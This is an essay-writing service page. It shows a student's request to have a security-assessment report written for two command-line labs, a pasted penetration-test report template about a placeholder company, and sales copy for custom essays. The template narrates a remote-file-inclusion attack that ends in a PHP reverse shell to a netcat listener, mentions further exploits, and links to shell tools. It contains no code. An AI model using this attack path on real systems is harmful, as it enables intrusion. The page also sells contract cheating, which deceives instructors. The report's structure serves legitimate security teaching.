A. T. Still University Fast Tech Corp Security Report This consumer security grade report has to do with two previous virtual labs i have completed on the

A. T. Still University Fast Tech Corp Security Report This consumer security grade report has to do with two previous virtual labs i have completed on the command line. I have provided an example of an security example report that should be followed. In this report you should list vulnerabilities that possibly were found and what exactly was found in the two assignments. I will attach the two assignments i have completed so you can based the security report off of those two. I will attatch my two assignments that i have did once we have talked. Please read instructions clearly and requirements and follow the template, as i have attached both. [COMPANY NAME]
Assessment Report
Penetration Test Engagement Report for:
Company Name
Table of Contents
1
2
Background …………………………………………………………………………………………………………. 4
Executive Summary ……………………………………………………………………………………………… 5
2.1
2.2
2.3
2.4
3
Vulnerability Report …………………………………………………………………………………………….. 8
3.1
3.2
3.3
4
Summary of Events ………………………………………………………………………………………………. 5
Findings Overview ……………………………………………………………………………………………….. 5
Overall Observations …………………………………………………………………………………………….. 7
Noted Strengths ……………………………………………………………………………………………………. 7
Findings Summary ………………………………………………………………………………………………… 8
Detailed findings…………………………………………………………………………………………………… 9
Severity Rating Criteria ……………………………………………………………………………………….. 10
Attack Path Replication ………………………………………………………………………………………. 11
4.1
Initial Access ……………………………………………………………………………………………………… 11
5
Remediation Plan ……………………………………………………………………………………………….. 12
Appendix A:
Systems & Services Chart ……………………………………………………………………… 13
Appendix B:
Acronyms ……………………………………………………………………………………………. 14
Page 2
Figures List
Figure 1: Assessment Logistics ……………………………………………………………………………………….. 4
Figure 2: COMPANY Assessment Environment ………………………………………………………………… 5
Figure 3: Vulnerabilities by System …………………………………………………………………………………. 6
Figure 4: Findings by Severity …………………………………………………………………………………………. 6
Figure 5: Findings Summary …………………………………………………………………………………………… 8
Figure 6: RFI Attack ………………………………………………………………………………………………………. 9
Figure 7: System Privilege on the Web Server ………………………………………………………………….. 10
Figure 8: Overwritten EIP ………………………………………………………………………………………………. 11
Figure 9: Windows XP Discovery …………………………………………………………………………………… 12
Figure 10: Cleartext Passwords from the Customer Information Database …………………………… 13
Figure 11: Successful MS17-010 / EternalBlue Exploitation ………………………………………………. 14
Figure 12: Administrative password reuse to access UbuntuServer11 ………………………………….. 15
Figure 13: Verbose Error ……………………………………………………………………………………………….. 16
Figure 14: Username Enumeration ………………………………………………………………………………….. 17
Figure 15: Web Directory Script Availability …………………………………………………………………… 18
Figure 16: Test Request from Server to Attacker ……………………………………………………………… 11
Figure 17: Elevated access on Dedicated Web Server……………………………………………………….. 21
Figure 18: Malicious User Creation ………………………………………………………………………………… 21
Figure 19: RDP Access to the Dedicated Web Server ……………………………………………………….. 22
Figure 20: Cleartext Root MYSQL Credentials ……………………………………………………………….. 23
Figure 21: Establishing sessions & routes with Meterpreter ………………………………………………. 23
Figure 22: NetEnum Host Discovery ………………………………………………………………………………. 24
Figure 23: Access Log Host Discovery …………………………………………………………………………… 24
Figure 24: Python Server Access Script ………………………………………………………………………….. 25
Figure 25: Successful MS08-067 Exploit ………………………………………………………………………… 26
Figure 26: Customer Information Test Server ………………………………………………………………….. 26
Figure 27: Buffer Overflow Vulnerability Found ……………………………………………………………… 27
Figure 28: EIP Offset Discovery…………………………………………………………………………………….. 27
Figure 29: Final & Operational Buffer Overflow ……………………………………………………………… 28
Figure 30: Proof of Concept Execution of Overflow Exploit ……………………………………………… 29
Figure 31: Initial DMZ Server Scan ……………………………………………………………………………….. 30
Figure 32: Vulnerable Kernel & GCC Version ………………………………………………………………… 30
Page 3
1 Background
OPERATOR conducted a black-box penetration test at the behest of COMPANY. The specific
logistics for this engagement are provided below in figure 1:
Customer
Assessor
Assessment Dates
Assessment Scope
COMPANY Testing Details
COMPANY
OPERATOR
XXX – XXX
COMPANY Corporate Network
1.2.3.0/24
COMPANY DMZ
2.3.4.0/24
Dedicated Web Server
3.4.5.6
Assessment Location
Domain
COMPANY.com
Intranet.COMPANY.com
Remote
Figure 1: Assessment Logistics
This assessment followed a model that emulated an external adversary using realistic attack
techniques and sophisticated tradecraft. It used a “Black Box” testing scenario, in which the
assessor had no prior knowledge of the organization’s infrastructure or assets. The purpose of this
assessment was to determine the security posture of COMPANY by discovering and categorizing
vulnerabilities found within the environment. As these vulnerabilities were discovered, the
assessor would attempt to exploit them to determine their overall impact both individually and as
part of an attack chain. The findings, their impact, and the overall attack path from the assessment
are included in this report, along with remediation plans to further secure the COMPANY
environment based off of those findings. The scope of the assessment and IP ranges involved can
be found below in Figure 2.
For ease of distribution amongst leadership and team members, this report is formatted so each
section stands individually.
Page 4
2 Executive Summary
2.1 Summary of Events
By the close of the assessment, the assessor successfully compromised COMPANY’s web server,
corporate network, and DMZ. Initial access to the environment was gained via the web server,
which provided a point of ingress to the corporate network once compromised. With this initial
access, the assessor successfully gained control of the other network hosts and used this access to
pivot into and gain administrative access on the DMZ server. The details of the specific
vulnerabilities discovered during the attack replication phase can be found in Section 3, and a full
write-up on the attack path can be found in Section 4.
Figure 2: Fake COMPANY Assessment Environment
2.2 Findings Overview
In addition to the Dedicated Web Server, 6 systems were discovered in the Corporate domain and
one additional server was discovered in the COMPANY DMZ. Both the Dedicated Web Server
and the DMZ server were found to have vulnerabilities, and 3 of the 6 systems in the Corporate
network were deemed vulnerable.
Page 5
14 notable findings were discovered throughout the course of the assessment, with a large subset
of them residing within the Dedicated Web Server. As the Dedicated Web Server is a public facing
device, these vulnerabilities provided a large attack footprint for the initial attempts at accessing
the environment.
Vulnerabilities by System
7
6
5
4
3
2
1
0
Critical
High
Medium
Low
Figure 3: Vulnerabilities by System
Across all the vulnerabilities discovered, the majority of them were in the “High” category when
ranked by severity. Due to this, as vulnerabilities were discovered the impact of their exploitation
was significantly increased, often resulting in administrative or system level access on the
compromised systems.
Findings By Severity
8
7
6
5
4
3
2
1
0
Critical
High
Medium
Figure 4: Findings by Severity
Page 6
Low
2.3 Overall Observations
The issues and configurations abused during the attack replication phase enabled the team to make
several concluding observations to assist COMPANY in identifying their critical areas of risk:
• Web server misconfigurations were pivotal for initial access
• Users and administrators could benefit from education on data hygiene
• Updated patch management would quickly correct several exploitable issues
• Code review for COMPANY homebrew applications could greatly reduce the attack
surface area
• COMPANY should continue to conduct consistent network audits and assessments to
reduce issues and take action on assessment findings.
2.4 Noted Strengths
While conducting the assessment, the assessor noted the following technical controls or defensive
measures that prevented or hampered offensive actions:
• JavaScript code validation in place to prevent XSS and SQLi attacks on the Dedicated
Web Server comment section
• Maintained segmentation of network environments based on their operations – Corporate
and DMZ
• Most passwords were difficult to crack and could not be found in general wordlists
Page 7
3 Vulnerability Report
3.1 Findings Summary
The assessment methodology utilized identified the following findings as exploitable
vulnerabilities during the attack replication phase. Each finding includes a description, supporting
details, and recommended steps for mitigation. The following findings are presented for review,
validation, and remediation as deemed appropriate. The COMPANY team should review the
findings and recommendations for technical weaknesses, shortcomings in processes and
procedures, and systemic weaknesses in overall security posture. See Section 3.3 for definitions
of each level of severity (Critical/High/Medium/Low).
ID
1
2
3
4
5
6
7
8
9
10
Finding Name
Insecure Web Service
Elevated Service Account Privileges
Application Logic Issue
Unsupported OS or Application
Cleartext Password Disclosure
Patch Management
Elevated Password Reuse
Verbose Error Messages
Username Enumeration
Web Server Directory Listing
Figure 5: Findings Summary
Page 8
Criticality
Critical
Critical
Critical
High
High
High
High
Medium
Medium
Low
3.2 Detailed findings
ID
Finding Name
Severity
1
Insecure Web Service
Critical
Affected System(s)
x.x.x.x

\SystemName
Description
The web server is hosting an application or service that contains an exploitable condition. This
could lead to command execution on the host or unauthorized access to other parts of the
application.
Specifically, an RFI (Remote File Inclusion) vulnerability was discovered within the “About
Us” page of the site. The “location=” reference in the URL points to a local file, but an attacker
can modify the URL to point to a file on an external server. The external file is then retrieved
and executed by the victim server.
Recommended Mitigation
Ensure that all applications and services hosted on a web server are a necessary business
function and are hardened to prevent unauthorized access or unintended use.
Relevant Screenshot
This screenshot shows the modified URL being requested from the ELS-WINSER2003 Server,
resulting in a file being pulled from the attacker’s system.
Figure 6: RFI Attack
Security Reference (FCRM, NIST, etc.)
NIST 800-53: CM-6, SI-1
NIST Cybersecurity PR. IP-1, PR. IP-2
[There would be a detailed finding provided for each finding listed in Figure 5]
Page 9
3.3 Severity Rating Criteria
Severity
Critical
High
Medium
Low
Description
Critical vulnerabilities pose an immediate and severe risk to the environment because of the
ease of exploit and potential severe impact. Critical items will be brought to the customer’s
attention immediately.
Intruders may be able to exercise full control on the targeted device. Examples include:
? Easily exploitable vulnerabilities that can lead to complete application, system, or
network compromise, such as an intruder having the ability to remotely administer
files on a web server
? Severe router/firewall/server misconfigurations
? Worm, Trojan, or backdoor detected
? Vulnerability that has tools readily available on the Internet to take advantage of it
? Weak passwords for remote administration and users
Intruders may be able to exercise some control of the targeted device. Examples include:
? Disclosure of unauthorized sensitive customer information or user account
information
? Ability of an intruder to obtain full read access to corporate confidential information
? Lack of basic logging and alerting capabilities
? Antivirus misconfigurations
? Untrusted networks having access to trusted networks
The vulnerabilities discovered are reported as items of interest but are not normally
exploitable. Many low items reported by security tools are not included in this report because
they are often informational, unverified, or of minor risk.
Page 10
4 Attack Path Replication
The attack path replication section details the thought process and steps taken by the assessor that
led to the compromise of the COMPANY environment. These steps are provided in series to
provide insight into how an attacker could chain different vulnerabilities together to compromise
a target network or system. Only vulnerabilities prevalent to the attack path are discussed in this
section; for the full list of discovered vulnerabilities, please see section 3.
4.1 Initial Access
The scope of the assessment provided two subnets (Corporate and DMZ), and the Dedicated Web
Server. Believing the web server to be the primary junction between the outside world and the
subnets, this was targeted first. Scans were performed with Hostenum 1 and NMAP to fingerprint
open ports and services while the web application was manually inspected. DIRB 2 and NIKTO 3
were also used to enumerate possible web directories and vulnerabilities.
While combing through the pages of the web site, a PHP reference pointer was seen in the URL
for the “About Us” page. The assessor tested the exploitability of this reference by modifying the
URL to request “a.txt” from the attack system to see if it would reach out.
Figure 7: Test Request from Server to Attacker
This verified the existence of an RFI vulnerability. A payload or other malicious file could be
hosted in place of “a.txt”, and when the malicious URL is entered the web server would access
and execute that file within the context of the web page.
To exploit this, the assessor hosted a PHP reverse shell file 4 that calls back to a listener once
executed. The IP address and port were set within the PHP file, which was then hosted on the
attack server as wrs.php. The netcat 5 listener was established on the attack system to receive the
callback. Then as this newly hosted file was placed in the URL and the web request was made,
the web server executed the file and spawned a shell to the netcat listener.
1
http://www.mediafire.com/file/w5vn2d59fygnd5a/host-enum.sh
https://tools.kali.org/web-applications/dirb
3
https://cirt.net/Nikto2
4
https://github.com/Dhayalanb/windows-php-reverse-shell
5
http://netcat.sourceforge.net/
2
Page 11
5 Remediation Plan
It is recommended that the COMPANY security team review the remediation items provided for
each vulnerability discovered within the environment. This information is listed in Section 3.
Through this review, the security team should determine if the remediation can be safely applied
with minimal impact to environment operations, or if any adverse impact to network operations is
worth the risk involved with remediating the vulnerability.
In addition to the findings involved above, the security team should have any users mentioned in
this report create a new password since their previous one may have been exposed. It would be
prudent to use this as an opportunity to ensure new passwords adhere to any password policy put
in place by the COMPANY leadership.
The security team should review the attack path and replay portions of the attack as applicable.
By replicating the attack path, you are generating an opportunity to modify host and network-based
protection mechanisms so they catch attack vectors that may have previously gone by undetected.
If applicable to this environment, it is recommended that a baseline operating system be established
and installed throughout the domain. This combined with a proper patch management plan would
significantly reduce the available attack vectors discovered in this assessment.
If there are any questions, the assessor can be reached at the following:
Assessor’s Name
AssessorName@OperatorCompany.com
(123)456-7890
Page 12
Appendix A:
Host (IP)
x.x.x.x
\SystemName
x.x.x.x
\SystemName
x.x.x.x \SystemName
x.x.x.x
\SystemName
x.x.x.x
\SystemName
x.x.x.x
\SystemName
x.x.x.x \SystemName
x.x.x.x
\SystemName
Systems & Services Chart
Open Ports
Services
80, 135, 139,
443, 1025,
3306, 3389
Apache, msrpc,
Netbios-ssn, mysql,
ms-wbt-server
YES
135, 139
msrpc, netbios-ssn
NO
135, 139, 445
139,445
msrpc, Netbios-ssn,
Microsoft-ds
Netbios-ssn,
Microsoft-ds
Obtained
Access?
YES
Access Type
Reverse Shell
(Web Based RFI)
Bind Shell
(MS08-067)
NO
135, 139, 445,
554, 2869,
10243, 49152,
49153, 49154,
49155, 49156,
49157
msrpc, Netbios-ssn,
Microsoft-ds, rtsp,
http
YES
135, 139
msrpc, netbios-ssn
NO
80, 135, 139,
445
Apache, msrpc,
netbios-ssn,
Microsoft-ds
YES
Reverse Shell
(Buffer Overflow)
21, 22
Vsftpd, OpenSSH
YES
SSH
(User, Pass)
Page 13
RDP
(User, Pass)
Bind Shell
(MS17-010)
Appendix B:
Acronyms
C2
DIRB
DMZ
FTP
HTTP
MYSQL
NMAP
PHP
RDP
RFI
SQLi
SSH
URL
XP-SP3
XSS
Command and Control
Directory Buster
De-Militarized Zone
File Transfer Protocol
HyperText Transfer Protocol
Michael Widenius Structured Query Language
Network Mapper
Personal Home Page
Remote Desktop Protocol
Remote File Inclusion
Structured Query Language (SQL) Injection
Secure Shell
Uniform Resource Locator
Windows XP Service Pack 3
Cross Site Scripting
Page 14
TDA – Assignment 5:
Reporting Activity
Assignment 5 objectives:
•
•
•
•
•
You must submit a complete consumer-grade assessment report on your activity.
Use the provided template to develop your report on activity taken against A3A4.
Submit your completed report in PDF format by the provided due date
Completion requires the following:
o Report meets all repor…
Purchase answer to see full
attachment

Don't use plagiarized sources. Get Your Custom Essay on
A. T. Still University Fast Tech Corp Security Report This consumer security grade report has to do with two previous virtual labs i have completed on the
Just from $13/Page
Order Essay
Homework Writings Pro
Calculate your paper price
Pages (550 words)
Approximate price: -

Why should I choose Homework Writings Pro as my essay writing service?

We Follow Instructions and Give Quality Papers

We are strict in following paper instructions. You are welcome to provide directions to your writer, who will follow it as a law in customizing your paper. Quality is guaranteed! Every paper is carefully checked before delivery. Our writers are professionals and always deliver the highest quality work.

Professional and Experienced Academic Writers

We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.

Reasonable Prices and Free Unlimited Revisions

Typical student budget? No problem. Affordable rates, generous discounts - the more you order, the more you save. We reward loyalty and welcome new customers. Furthermore, if you think we missed something, please send your order for a free review. You can do this yourself by logging into your personal account or by contacting our support..

Essay Delivered On Time and 100% Money-Back-Guarantee

Your essay will arrive on time, or even before your deadline – even if you request your paper within hours. You won’t be kept waiting, so relax and work on other tasks.We also guatantee a refund in case you decide to cancel your order.

100% Original Essay and Confidentiality

Anti-plagiarism policy. The authenticity of each essay is carefully checked, resulting in truly unique works. Our collaboration is a secret kept safe with us. We only need your email address to send you a unique username and password. We never share personal customer information.

24/7 Customer Support

We recognize that people around the world use our services in different time zones, so we have a support team that is happy to help you use our service. Our writing service has a 24/7 support policy. Contact us and discover all the details that may interest you!

Try it now!

Calculate the price of your order

Total price:
$0.00

How it works?

Follow these simple steps to get your paper done

Place your order

Fill in the order form and provide all details of your assignment.

Proceed with the payment

Choose the payment system that suits you most.

Receive the final file

Once your paper is ready, we will email it to you.

Our Services

Our reputation for excellence in providing professional tailor-made essay writing services to students of different academic levels is the best proof of our reliability and quality of service we offer.

Essays

Essay Writing Service

When using our academic writing services, you can get help with different types of work including college essays, research articles, writing, essay writing, various academic reports, book reports and so on. Whatever your task, homeworkwritingspro.com has experienced specialists qualified enough to handle it professionally.

Admissions

Admission Essays & Business Writing Help

An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.

Reviews

Editing Support

Our professional editor will check your grammar to make sure it is free from errors. You can rest assured that we will do our best to provide you with a piece of dignified academic writing. Homeworkwritingpro experts can manage any assignment in any academic field.

Reviews

Revision Support

If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.

See all services